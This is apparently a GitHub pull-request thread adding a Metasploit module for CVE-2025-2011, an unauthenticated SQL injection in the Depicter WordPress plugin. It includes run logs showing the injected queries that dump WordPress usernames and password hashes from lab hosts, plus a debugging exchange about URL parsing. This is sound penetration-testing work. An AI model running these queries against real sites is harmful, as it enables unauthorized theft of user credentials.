Add WP Depicter Plugin Unauth SQL Injection (CVE-2025-2011)

[Chocapikk]

Hello Metasploit Team,

This PR implements a new auxiliary scanner module scanner/http/wp_depicter_sqli_cve_2025_2011 for CVE-2025-2011, an UNAUTHENTICATED SQL injection in the Slider & Popup Builder by Depicter plugin (≤ 3.6.1).

The module automates:

1. Database enumeration via a UNION-based payload on admin-ajax.php?s=
2. Table enumeration to infer the WordPress table prefix
3. User credential extraction (user_login:user_pass) from the inferred *_users table
4. Credential creation, loot storage (wordpress.users), and reporting

Verification

• Start msfconsole
• use auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011
• set RHOSTS <target_ip>
• set RPORT <http_port>
• set TARGETURI /
• set COUNT 1
• Run the module
  • ✔️ Should display:
    • Database name (e.g. exploit_market)
    • Tables list and inferred prefix (e.g. wp_users)
    • User credentials in a formatted table
    • Loot saved under wordpress.users
• Verify credentials are created in the database (if connected)
• Verify no side effects on the plugin or site functionality

[Chocapikk]

Hello @dledda-r7 ,

I’m running into an odd issue with the auxiliary module:

Working
When I use exploit, everything behaves as expected:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'cIJK')
[*] {SQLi} Encoded to (select 0x63494a4b)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 12 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 12 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(euCJqzGY) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) euCJqzGY from wp_users limit 1) zSl)
[*] {SQLi} Encoded to (select group_concat(euCJqzGY) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x7,0)),ifnull(user_pass,repeat(0x7b,0))) as binary) euCJqzGY from wp_users limit 1) zSl)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    chocapikk   $wp$2y$10$rc5oXfNPG.bYSnbYvELKZeGgoQ9.QHcAXG8U/xunfXzsviMQkiPga

[+] Loot saved to: /home/chocapikk/.msf4/loot/20250521182831_default_127.0.0.1_wordpress.users_873419.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Failing
But when I try run http://lab:5555, it immediately errors out:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://lab:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'OEFldU')
[*] {SQLi} Encoded to (select 0x4f45466c6455)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in 'Rex::Socket.rex_resolve_hostname'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in 'Rex::Socket.rex_getaddrinfo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in 'Rex::Socket.getaddresses'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in 'Rex::Socket.getaddress'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in 'Rex::Socket.resolv_nbo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in 'Rex::Socket.resolv_nbo_i'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in 'Rex::Socket::SwitchBoard#best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in 'Rex::Socket::SwitchBoard.best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in 'Rex::Socket::Parameters#comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in 'Rex::Socket.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in 'Rex::Socket::Tcp.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in 'Rex::Socket::Tcp.create'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:177:in 'Rex::Proto::Http::Client#connect'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:262:in 'Rex::Proto::Http::Client#send_request'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:240:in 'Rex::Proto::Http::Client#_send_recv'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:214:in 'Rex::Proto::Http::Client#send_recv'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:381:in 'Msf::Exploit::Remote::HttpClient#send_request_raw'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:423:in 'Msf::Exploit::Remote::HttpClient#send_request_cgi'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in 'block in Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#get_sqli_object'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:58:in 'Msf::Exploit::SQLi::Common#raw_run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:69:in 'Msf::Exploit::SQLi::Common#run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in 'Msf::Exploit::SQLi::MySQLi::Common#test_vulnerable'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in 'Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:44:in 'Msf::Exploit::Remote::AutoCheck#with_prepended_auto_check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:20:in 'Msf::Exploit::Remote::AutoCheck#run'
[*] Auxiliary module execution completed

Do you have any insight into why this is happening? Thanks!

[dledda-r7]

Hello @dledda-r7 ,

I’m running into an odd issue with the auxiliary module:

Working When I use exploit, everything behaves as expected:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'cIJK')
[*] {SQLi} Encoded to (select 0x63494a4b)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 12 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 12 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(euCJqzGY) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) euCJqzGY from wp_users limit 1) zSl)
[*] {SQLi} Encoded to (select group_concat(euCJqzGY) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x7,0)),ifnull(user_pass,repeat(0x7b,0))) as binary) euCJqzGY from wp_users limit 1) zSl)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    chocapikk   $wp$2y$10$rc5oXfNPG.bYSnbYvELKZeGgoQ9.QHcAXG8U/xunfXzsviMQkiPga

[+] Loot saved to: /home/chocapikk/.msf4/loot/20250521182831_default_127.0.0.1_wordpress.users_873419.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Failing But when I try run http://lab:5555, it immediately errors out:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://lab:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'OEFldU')
[*] {SQLi} Encoded to (select 0x4f45466c6455)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in 'Rex::Socket.rex_resolve_hostname'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in 'Rex::Socket.rex_getaddrinfo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in 'Rex::Socket.getaddresses'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in 'Rex::Socket.getaddress'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in 'Rex::Socket.resolv_nbo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in 'Rex::Socket.resolv_nbo_i'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in 'Rex::Socket::SwitchBoard#best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in 'Rex::Socket::SwitchBoard.best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in 'Rex::Socket::Parameters#comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in 'Rex::Socket.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in 'Rex::Socket::Tcp.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in 'Rex::Socket::Tcp.create'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:177:in 'Rex::Proto::Http::Client#connect'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:262:in 'Rex::Proto::Http::Client#send_request'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:240:in 'Rex::Proto::Http::Client#_send_recv'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:214:in 'Rex::Proto::Http::Client#send_recv'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:381:in 'Msf::Exploit::Remote::HttpClient#send_request_raw'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:423:in 'Msf::Exploit::Remote::HttpClient#send_request_cgi'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in 'block in Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#get_sqli_object'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:58:in 'Msf::Exploit::SQLi::Common#raw_run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:69:in 'Msf::Exploit::SQLi::Common#run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in 'Msf::Exploit::SQLi::MySQLi::Common#test_vulnerable'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in 'Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:44:in 'Msf::Exploit::Remote::AutoCheck#with_prepended_auto_check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:20:in 'Msf::Exploit::Remote::AutoCheck#run'
[*] Auxiliary module execution completed

Do you have any insight into why this is happening? Thanks!

Looks like an unrelated issue. I have digged a bit and i think we are passing the whole RHOSTS to the name resolver which doesn't look correct. adding @zeroSteiner for visibility as he was working on rex-socket currently.

[1] pry(#<Rex::Proto::Http::Client>)> exit

From: /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:979 Rex::Socket.rex_resolve_hostname:

    974:
    975:   # @param name [String] The hostname to lookup via the resolver
    976:   # @param resolver [Rex::Proto::DNS::CachedResolver] Resolver to query for the name
    977:   # @return [Array] Array of Dnsruby::Message responses for consumers to reformat
    978:   def self.rex_resolve_hostname(name, resolver: @@resolver)
 => 979:     binding.pry
    980:     raise ::SocketError.new(
    981:       "Rex::Socket internal DNS resolution requires passing/setting a resolver"
    982:     ) unless resolver
    983:     raise ::SocketError.new(
    984:       "Rex::Socket internal DNS resolution requires passing a String name to resolve"

[1] pry(Rex::Socket)> name
=> "http://127.0.0.1:5555"
[2] pry(Rex::Socket)>

additional context. seems a problem related to this module but not to all auxiliary modules.

msf6 auxiliary(scanner/http/title) > run http://localhost:5555/
[+] [127.0.0.1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 1 of 2 hosts (50% complete)
[+] [::1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) > run RHOSTS=http://localhost:5555/
[+] [127.0.0.1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 1 of 2 hosts (50% complete)
[+] [::1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) > use depicter

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_depicter_sqli_cve_2025_2011  2025-05-08       normal  No     WordPress Depicter Plugin SQL Injection (CVE-2025-2011)


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_depicter_sqli_cve_2025_2011

[*] Using auxiliary/gather/wp_depicter_sqli_cve_2025_2011
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://localhost:5555/
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'CTU7Crn3')
[*] {SQLi} Encoded to (select 0x4354553743726e33)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in `rex_resolve_hostname'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in `rex_getaddrinfo'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in `getaddresses'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in `getaddress'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in `resolv_nbo'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in `resolv_nbo_i'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in `best_comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in `best_comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in `comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in `create_param'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in `create_param'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in `create'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:177:in `connect'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:262:in `send_request'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:240:in `_send_recv'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:214:in `send_recv'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:381:in `send_request_raw'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:423:in `send_request_cgi'
[-]   /home/kali/Documents/github/metasploit-framework/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in `block in get_sqli_object'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/common.rb:58:in `raw_run_sql'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/common.rb:69:in `run_sql'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in `test_vulnerable'
[-]   /home/kali/Documents/github/metasploit-framework/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in `check'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:44:in `with_prepended_auto_check'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:20:in `run'
[*] Auxiliary module execution completed

[dledda-r7]

Looks good

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://127.0.0.1:5555
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'I3pDUa69ad')
[*] {SQLi} Encoded to (select 0x49337044556136396164)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 6 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 6 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(KbVRV) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[*] {SQLi} Encoded to (select group_concat(KbVRV) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xc3,0)),ifnull(user_pass,repeat(0x80,0))) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'admin' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    admin       $wp$2y$10$M8h2oj7BOKVXdKQMqYADbO8p3amrEj2iwVk0oGXYaGOpx948QVls2

[+] Loot saved to: /home/kali/.msf4/loot/20250528120414_default_127.0.0.1_wordpress.users_787790.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) >

[smcintyre-r7]

Release Notes

This adds a module for exploiting CVE-2025-2011 which is an unauthenticated SQL injection vulnerability in the "Slider & Popup Builder" plugin versions <= 3.6.1.